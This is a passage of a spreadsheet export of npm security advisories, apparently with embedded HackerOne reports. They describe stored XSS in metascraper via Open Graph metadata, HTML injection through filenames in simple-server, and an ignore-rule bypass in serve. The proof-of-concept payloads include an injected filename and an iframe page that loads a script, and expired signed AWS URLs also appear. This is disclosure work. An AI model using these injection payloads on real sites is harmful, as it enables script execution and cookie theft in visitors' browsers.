RWxj%2BwW6RukLXLr%2BE%2BTv3DQaklyllEbhxChPemVFdqcQOf%2BEotIG9t9zQN3KKGDmGAoiZXs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=c398d652a58003fa5a19c800560beb126f7cb0bd55a71f3af09880c53d6fb987" class="markdown-inline-image"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;As we can notice, our payload was displayed in the source page &amp;quot;as is&amp;quot;:&lt;/p&gt;
&lt;p&gt;&lt;a href="#" class="markdown-attachment-link markdown-attachment-inline-reference" data-attachment-filename="2.png" data-attachment-link="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/257/372/4c3e3add8dc7ad76e29e61191240a119fc0d3e17/2.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAIPYISVSGZY2YQQCA%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075035Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFcaDBeHYQK2BCCxrdZy9SK3A3X14%2B1%2Fo2m%2FCBdhIgQeiaJL4wsHQ78dmrLOi%2FFkus81if88VHw5LFQwGfWdr3D5A1S5CsWW4esj24p3FUt6ZBQn5hpi3JdmXMX%2BDu1QjqzJcjCrLif%2BwiwkjvD8QEujmImoreuMQZ5JR6xCghVJb1qeGNgiP73DslonGTBYW9JqcW61nTAp9j1Z7CAlbHNHF6PpisVI2Kp2dngHAPpfk0DynSHW0mseNzDmAGsZMA4a1HZ5RtO59UkR0Zo8czKPDg5CSJenolUG83IcbKbeXirUm88x8fIRtjtFn64ywLH83yVDVJlMPCKMT%2BrbeWDffgqQXXjs8lQ1T7jRfXjz3sJLOxpYdkSE%2FHnNj8ZHdovynDKalJS0zFP7lcyfpIXirrJGXKXhzq9897YB9pQ6DefomHqiA6enUaj1MoUKvAjXQlEl%2By3wvU%2BT0Ierli5Oc5e1XKhktqLZcXjkB9dSf5Ni6KDgUxHZHBbSMF8VN8GoGR0xuxQ5Zg%2BjgVJzzS8z5O3pO%2FcJ6RWxj%2BwW6RukLXLr%2BE%2BTv3DQaklyllEbhxChPemVFdqcQOf%2BEotIG9t9zQN3KKGDmGAoiZXs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=4cc64327cee4170f77e8e5f69549c083eb8376a118a153e8b1722b2683ed7320" data-attachment-type="image/png"&gt;&lt;img src="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/257/372/4c3e3add8dc7ad76e29e61191240a119fc0d3e17/2.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAIPYISVSGZY2YQQCA%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075035Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFcaDBeHYQK2BCCxrdZy9SK3A3X14%2B1%2Fo2m%2FCBdhIgQeiaJL4wsHQ78dmrLOi%2FFkus81if88VHw5LFQwGfWdr3D5A1S5CsWW4esj24p3FUt6ZBQn5hpi3JdmXMX%2BDu1QjqzJcjCrLif%2BwiwkjvD8QEujmImoreuMQZ5JR6xCghVJb1qeGNgiP73DslonGTBYW9JqcW61nTAp9j1Z7CAlbHNHF6PpisVI2Kp2dngHAPpfk0DynSHW0mseNzDmAGsZMA4a1HZ5RtO59UkR0Zo8czKPDg5CSJenolUG83IcbKbeXirUm88x8fIRtjtFn64ywLH83yVDVJlMPCKMT%2BrbeWDffgqQXXjs8lQ1T7jRfXjz3sJLOxpYdkSE%2FHnNj8ZHdovynDKalJS0zFP7lcyfpIXirrJGXKXhzq9897YB9pQ6DefomHqiA6enUaj1MoUKvAjXQlEl%2By3wvU%2BT0Ierli5Oc5e1XKhktqLZcXjkB9dSf5Ni6KDgUxHZHBbSMF8VN8GoGR0xuxQ5Zg%2BjgVJzzS8z5O3pO%2FcJ6RWxj%2BwW6RukLXLr%2BE%2BTv3DQaklyllEbhxChPemVFdqcQOf%2BEotIG9t9zQN3KKGDmGAoiZXs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=4cc64327cee4170f77e8e5f69549c083eb8376a118a153e8b1722b2683ed7320" class="markdown-inline-image"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;p&gt;Configuration I&amp;#39;ve used to find this vulnerability:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;macOS HighSierra 10.13.3&lt;/li&gt;
&lt;li&gt;node 8.9.3&lt;/li&gt;
&lt;li&gt;npm 5.5.1&lt;/li&gt;
&lt;li&gt;curl 7.54.0&lt;/li&gt;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&lt;p&gt;Although this is quite hard to exploit in the wild, there is no doubt such attack is possible. This might lead to malware distribution, session cookies from infected websites leaks, run cryptocurrency miners in users&amp;#39; browsers and many more attacks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-01-25T21:27:01.580Z</t>
  </si>
  <si>
    <t>2018-03-28T06:09:21.146Z</t>
  </si>
  <si>
    <t>Although this is quite hard to exploit in the wild, there is no doubt such attack is possible. This might lead to malware distribution, session cookies from infected websites leaks, run cryptocurrency miners in users' browsers and many more attacks.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Guys,  metascrapper vulnerable Stored XSS via Open Graph metadata, used HTML without sanitization.  Module    library easily scrape metadata article web using Open Graph metadata, regular HTML metadata, series fallbacks.  https //www.npmjs.com/package/metascraper  Description  Due lack HTML sanitization, possibility embed malicious code metadata read metascrapper. When library reads metadata, no sanitization performed. output metascrapper used directly HTML code, HTML embed metadata executed context page load render it.  Steps Reproduce   part PoC represents Attacker  attacker needs inject malicious code Open Graph property.   create website (I serve via static server available http //127.0.0.1 8080) witt following content. Please look payload embed og site_name meta property                metascraper                "                        save root directory server runs http //127.0.0.1 8080. create file following content save directory   alert("Uh oh, bad malware ")  Please aware JavaScript file malicious code served place. particular location Poc.  represents HTML page Â« Â»scrappedÂ« Â» metascrapper  part PoC represents legitimate User attack itself   install metascrapper required dependiences (got express)  $ npm install metascrapper express   create app will use metascrapper read webiste metadata. 8888 address server uses metascrapper. http //127.0.0.1 8080/article.html target website, metadata will read    const metascraper = require("metascraper") const = require("got") const express = require("express")  const targetUrl = "http //127.0.0.1 8080/article.html"  const app = express()  app.get("/scrap", function(req, res) {;     (async() =  {         const {             body  html,             url         } = await got(targetUrl)         const metadata = await metascraper({             html,             url         })         console.log(metadata)  // returned metadata console          /*             { author  null,                 date  null,                 description  "The HR startups go war.",                 image  "http //127.0.0.1 8080/image",                 lang  "en",                 logo  null,                 publisher  "",                 title  "test article",                 url  "http //127.0.0.1 8080/article.html" }         */         // display content browser         let __html = `                              site title  ${metadata.title}                 site publisher  ${metadata.publisher}                      `         res.send(__html)     })() })  app.listen(8888, () =  console.log("Example app listening port 8888 "))   run above app   $ node   go http //127.0.0.1 8888/scrap malicious JavaScript code embed site metadata og site_name executed      notice, payload displayed source page Â« Â»as isÂ« Â»     Supporting Material/References   Configuration I"ve used find vulnerability    macOS HighSierra 10.13.3 node 8.9.3 npm 5.5.1 curl 7.54.0   Wrap  hope report will help keep Node ecosystem safe. questions details finding, please let know comment.  Thank  Regards,  Rafal "bl4de" Janicki  Impact  Although quite hard exploit wild, no doubt attack possible. lead malware distribution, session cookies infected websites leaks, run cryptocurrency miners users" browsers attacks. </t>
  </si>
  <si>
    <t>Although quite hard exploit wild, no doubt attack possible. lead malware distribution, session cookies infected websites leaks, run cryptocurrency miners users' browsers attacks.</t>
  </si>
  <si>
    <t>Remote Memory Exposure</t>
  </si>
  <si>
    <t>/advisories/602</t>
  </si>
  <si>
    <t>2018-04-25T03:43:25.018+00:00</t>
  </si>
  <si>
    <t>mysql</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mysql</t>
  </si>
  <si>
    <t>&gt;=2.0.0-alpha8 &lt;=2.0.0-rc2 || &gt;=2.0.0 &lt;=2.13.0</t>
  </si>
  <si>
    <t>&gt;=2.14.0</t>
  </si>
  <si>
    <t>/advisories/601</t>
  </si>
  <si>
    <t>2018-04-25T03:40:06.457+00:00</t>
  </si>
  <si>
    <t>floody</t>
  </si>
  <si>
    <t>https://www.npmjs.com/floody</t>
  </si>
  <si>
    <t>&lt;0.1.1</t>
  </si>
  <si>
    <t>&gt;=0.1.1</t>
  </si>
  <si>
    <t>/advisories/600</t>
  </si>
  <si>
    <t>2018-04-25T03:36:41.832+00:00</t>
  </si>
  <si>
    <t>openwhisk</t>
  </si>
  <si>
    <t>https://www.npmjs.com/openwhisk</t>
  </si>
  <si>
    <t>&lt;3.3.1</t>
  </si>
  <si>
    <t>&gt;=3.3.1</t>
  </si>
  <si>
    <t>/advisories/599</t>
  </si>
  <si>
    <t>2018-04-25T03:33:39.857+00:00</t>
  </si>
  <si>
    <t>mongoose</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mongoose</t>
  </si>
  <si>
    <t>&gt;=3.5.5 &lt;=3.8.38 || &gt;=4.0.0 &lt;=4.3.5</t>
  </si>
  <si>
    <t>&gt;=4.3.6 || &gt;=3.8.39 &lt;4.0.0</t>
  </si>
  <si>
    <t>Memory Exposure</t>
  </si>
  <si>
    <t>/advisories/598</t>
  </si>
  <si>
    <t>2018-04-25T03:30:16.099+00:00</t>
  </si>
  <si>
    <t>tunnel-agent</t>
  </si>
  <si>
    <t>https://www.npmjs.com/tunnel-agent</t>
  </si>
  <si>
    <t>&lt;0.6.0</t>
  </si>
  <si>
    <t>&gt;=0.6.0</t>
  </si>
  <si>
    <t>/advisories/597</t>
  </si>
  <si>
    <t>2018-04-25T03:25:38.919+00:00</t>
  </si>
  <si>
    <t>concat-stream</t>
  </si>
  <si>
    <t>https://www.npmjs.com/concat-stream</t>
  </si>
  <si>
    <t>&gt;=1.3.0 &lt;1.3.2 || &gt;=1.4.0 &lt;1.4.11 || &gt;=1.5.0 &lt;1.5.2</t>
  </si>
  <si>
    <t>&gt;=1.5.2 || &gt;=1.4.11 &lt;1.5.0 || &gt;=1.3.2 &lt;1.4.0</t>
  </si>
  <si>
    <t>/advisories/596</t>
  </si>
  <si>
    <t>2018-04-24T23:24:58.144+00:00</t>
  </si>
  <si>
    <t>bl</t>
  </si>
  <si>
    <t>https://www.npmjs.com/bl</t>
  </si>
  <si>
    <t>&lt;=0.9.4 || 1.0.0</t>
  </si>
  <si>
    <t>&gt;=0.9.5 &lt;1.0.0 || &gt;=1.0.1</t>
  </si>
  <si>
    <t xml:space="preserve">[simple-server] HTML with iframe element can be used as filename, which might lead to load and execute malicious JavaScript </t>
  </si>
  <si>
    <t>/advisories/595</t>
  </si>
  <si>
    <t>2018-04-24T23:17:26.87+00:00</t>
  </si>
  <si>
    <t>simple-server</t>
  </si>
  <si>
    <t>https://www.npmjs.com/simple-server</t>
  </si>
  <si>
    <t>&lt;1.1.0</t>
  </si>
  <si>
    <t>&gt;=1.1.0</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/309641.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi Guys,&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;simple-server&lt;/strong&gt; allows to embed HTML in file names, which (in certain conditions) might lead to execute malicious JavaScript. This is caused by outdated version of &lt;code&gt;connect&lt;/code&gt; framework.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Module:&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;Simple Server allows you to easily get a node.js static file server up and running anywhere anytime.&lt;/p&gt;
&lt;p&gt;&lt;a title="https://www.npmjs.com/package/simple-server" href="/redirect?signature=72aee57715d9a5bb99afb358b5155f541ad8dd3b&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fsimple-server" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/simple-server&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This issue is exactly the same I&amp;#39;ve reported for &lt;code&gt;anywhere&lt;/code&gt; module (&lt;a title="https://hackerone.com/reports/309394" href="https://hackerone.com/reports/309394"&gt;https://hackerone.com/reports/309394&lt;/a&gt;).&lt;br&gt;
The problem is outdated &lt;code&gt;connect&lt;/code&gt; framework (2.10.0) with obsolete middleware used to display content of the directory as HTML.&lt;/p&gt;
&lt;p&gt;This is the code which allows to embed HTML in file names and execute attack described in PoC (&lt;code&gt;/node_modules/connect/lib/middleware/directory.js&lt;/code&gt;, lines 192-197):&lt;/p&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;li&amp;gt;&amp;lt;a href=&amp;quot;&amp;#39;&lt;/span&gt;
      &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;utils&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;normalizeSlashes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;normalize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;path&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt;
      &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;quot; class=&amp;quot;&amp;#39;&lt;/span&gt;
      &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;classes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39; &amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;quot;&amp;#39;&lt;/span&gt;
      &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39; title=&amp;quot;&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;file&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;quot;&amp;gt;&amp;#39;&lt;/span&gt;
      &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;icon&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;file&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As you can see, &lt;code&gt;file&lt;/code&gt; is output directly into HTML without any sanitization.&lt;/p&gt;
&lt;p&gt;Now, take a look how the same fragment of code looks in &lt;code&gt;serve-index&lt;/code&gt; middleware, introduced in place of old middlewares like &lt;code&gt;directory.js&lt;/code&gt; above, and  used in current Connect and Express frameworks (&lt;a title="https://github.com/expressjs/serve-index/blob/a399faa1801f02ee1885e5664ed21a9c7990b63a/index.js#L279):" href="/redirect?signature=46cd8d848a9895c823e15f74c1552d8e2193b909&amp;amp;url=https%3A%2F%2Fgithub.com%2Fexpressjs%2Fserve-index%2Fblob%2Fa399faa1801f02ee1885e5664ed21a9c7990b63a%2Findex.js%23L279%29%3A" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://github.com/expressjs/serve-index/blob/a399faa1801f02ee1885e5664ed21a9c7990b63a/index.js#L279):&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;li&amp;gt;&amp;lt;a href=&amp;quot;&amp;#39;&lt;/span&gt;
      &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;escapeHtml&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;normalizeSlashes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;normalize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;path&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;))))&lt;/span&gt;
      &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;quot; class=&amp;quot;&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;escapeHtml&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;classes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39; &amp;#39;&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;quot;&amp;#39;&lt;/span&gt;
      &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39; title=&amp;quot;&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;escapeHtml&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;file&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;name&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;quot;&amp;gt;&amp;#39;&lt;/span&gt;
      &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;span class=&amp;quot;name&amp;quot;&amp;gt;&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;escapeHtml&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;file&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;name&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;/span&amp;gt;&amp;#39;&lt;/span&gt;
      &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;span class=&amp;quot;size&amp;quot;&amp;gt;&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;escapeHtml&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;size&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;/span&amp;gt;&amp;#39;&lt;/span&gt;
      &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;span class=&amp;quot;date&amp;quot;&amp;gt;&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;escapeHtml&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;date&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;/span&amp;gt;&amp;#39;&lt;/span&gt;
      &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;All output data is sanitized with &lt;code&gt;escapeHtml()&lt;/code&gt; which sanitizes HTML before is send to browser.&lt;/p&gt;
&lt;p&gt;I think this is the problem of all older npm modules using old versions of Connect middlewares like &lt;code&gt;directory.js&lt;/code&gt;.&lt;/p&gt;
&lt;h2 id="poc-steps-to-reproduce"&gt;PoC - Steps To Reproduce:&lt;/h2&gt;
&lt;p&gt;In the directory which will be served via &lt;code&gt;simple-server&lt;/code&gt;, create file with following name:&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;quot;&amp;gt;&amp;lt;iframe src=&amp;quot;malware_frame.html&amp;quot;&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then, HTML file with following content have to be saved in the same directory as file with the name changed:&lt;/p&gt;
&lt;pre class="highlight html"&gt;&lt;code&gt;&lt;span class="nt"&gt;&amp;lt;html&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;head&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;meta&lt;/span&gt; &lt;span class="na"&gt;charset=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;utf8&amp;quot;&lt;/span&gt; &lt;span class="nt"&gt;/&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;title&amp;gt;&lt;/span&gt;Frame embeded with malware :P&lt;span class="nt"&gt;&amp;lt;/title&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/head&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;body&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;p&amp;gt;&lt;/span&gt;iframe element with malicious code&lt;span class="nt"&gt;&amp;lt;/p&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;script &lt;/span&gt;&lt;span class="na"&gt;type=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;text/javascript&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;src=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;malware.js&amp;quot;&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&amp;lt;/script&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/html&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;An &lt;code&gt;src&lt;/code&gt; attribute value I&amp;#39;ve used here is just for PoC purpose, this can be any external url.&lt;br&gt;
On my local machine, &lt;code&gt;malware.js&lt;/code&gt; has following content:&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;alert(&amp;#39;Uh oh, I am very bad malware!&amp;#39;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Run &lt;code&gt;simple-server`` in directory where both file with filename changed and&lt;/code&gt;malware_frame.html``` are saved:&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ ./node_modules/simple-server/bin/simple-server.js ./ 8080
Simple-Server listening to http://:::8080/ with directory /Users/bl4de/playground/node_bugbounty_playground
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and open &lt;code&gt;http://127.0.0.1:8080&lt;/code&gt; in the browser, you can see JavaScript from &lt;code&gt;malware.js&lt;/code&gt; is executed.&lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;p&gt;Configuration I&amp;#39;ve used to find this vulnerability:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;macOS HighSierra 10.13.3&lt;/li&gt;
&lt;li&gt;node 8.9.3&lt;/li&gt;
&lt;li&gt;npm 5.5.1&lt;/li&gt;
&lt;li&gt;curl 7.54.0&lt;/li&gt;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&lt;p&gt;Exploitation of this vulnerability in the wild might be hard, however it&amp;#39;s not impossible and it depends only on attacker&amp;#39;s skills to get into directory on the server, where &lt;code&gt;simple-server&lt;/code&gt; is used to serve static content.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-01-26T21:38:57.170Z</t>
  </si>
  <si>
    <t>2018-03-01T23:04:03.545Z</t>
  </si>
  <si>
    <t>Exploitation of this vulnerability in the wild might be hard, however it's not impossible and it depends only on attacker's skills to get into directory on the server, where simple-server is used to serve static content.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Guys,  simple server allows embed HTML file names, (in certain conditions) lead execute malicious JavaScript. caused outdated version connect framework.  Module    Simple Server allows easily static file server running anywhere anytime.  https //www.npmjs.com/package/simple server  Description  issue exactly I"ve reported anywhere module (https //hackerone.com/reports/309394). problem outdated connect framework (2.10.0) obsolete middleware used display content directory HTML.  code allows embed HTML file names execute attack described PoC (/node_modules/connect/lib/middleware/directory.js, lines 192 197)       return ""       + icon + file + "";  see, file output directly HTML without sanitization.  Now, look fragment code looks serve index middleware, introduced place old middlewares above,  used current Connect Express frameworks (https //github.com/expressjs/serve index/blob/a399faa1801f02ee1885e5664ed21a9c7990b63a/index.js#L279)  return ""       + "" + escapeHtml(file.name) + ""       + "" + escapeHtml(size) + ""       + "" + escapeHtml(date) + ""       + "";  output data sanitized escapeHtml() sanitizes HTML send browser.  think problem older npm modules using old versions Connect middlewares directory.js.  PoC   Steps Reproduce   directory will served via simple server, create file following name  Â« Â»   Then, HTML file following content saved directory file name changed              Frame embeded malware  P        iframe element malicious code          src attribute value I"ve used just PoC purpose, external url. local machine, following content  alert("Uh oh, bad malware ")  Run simple server`` directory file filename changed andmalware_frame.html``` saved  $ ./node_modules/simple server/bin/simple ./ 8080 Simple Server listening http //   8080/ directory /Users/bl4de/playground/node_bugbounty_playground  open http //127.0.0.1 8080 browser, JavaScript executed.  Supporting Material/References   Configuration I"ve used find vulnerability    macOS HighSierra 10.13.3 node 8.9.3 npm 5.5.1 curl 7.54.0   Wrap  hope report will help keep Node ecosystem safe. questions details finding, please let know comment.  Thank  Regards,  Rafal "bl4de" Janicki  Impact  Exploitation vulnerability wild hard, however it"s not impossible depends attacker"s skills directory server, simple server used serve static content. </t>
  </si>
  <si>
    <t>Exploitation vulnerability wild hard, however it's not impossible depends attacker's skills directory server, simple-server used serve static content.</t>
  </si>
  <si>
    <t>[serve] Directory listing and File access even when they have been set to be ignored.</t>
  </si>
  <si>
    <t>/advisories/594</t>
  </si>
  <si>
    <t>2018-04-24T23:13:23.123+00:00</t>
  </si>
  <si>
    <t>&lt;6.5.2</t>
  </si>
  <si>
    <t>&gt;=6.5.2</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/308721.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Module:&lt;/strong&gt; &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Name&lt;/strong&gt;: &lt;code&gt;serve&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Version&lt;/strong&gt;: latest (&lt;code&gt;6.4.9&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Link&lt;/strong&gt;: &lt;a title="https://www.npmjs.com/package/serve" href="/redirect?signature=330ade5f3e8725e433110dc283931dc8f758aa56&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fserve" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/serve&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt;&lt;br&gt;
The &lt;code&gt;serve&lt;/code&gt; modules allows directory browsing and to serve static files through the browser.&lt;br&gt;
The config option &lt;code&gt;ignore&lt;/code&gt; can be used to tell the module which file or directory are forbidden and should not be served. &lt;br&gt;
This rule can be bypassed by url encoding the name of the file or directory that has been forbidden. &lt;/p&gt;
&lt;h2 id="reproduction-steps"&gt;Reproduction Steps:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Install &lt;code&gt;serve&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Create an application that uses serve for file serving listing and set a few folders and files in the &lt;code&gt;ignore&lt;/code&gt; config.&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;serve&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;serve&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
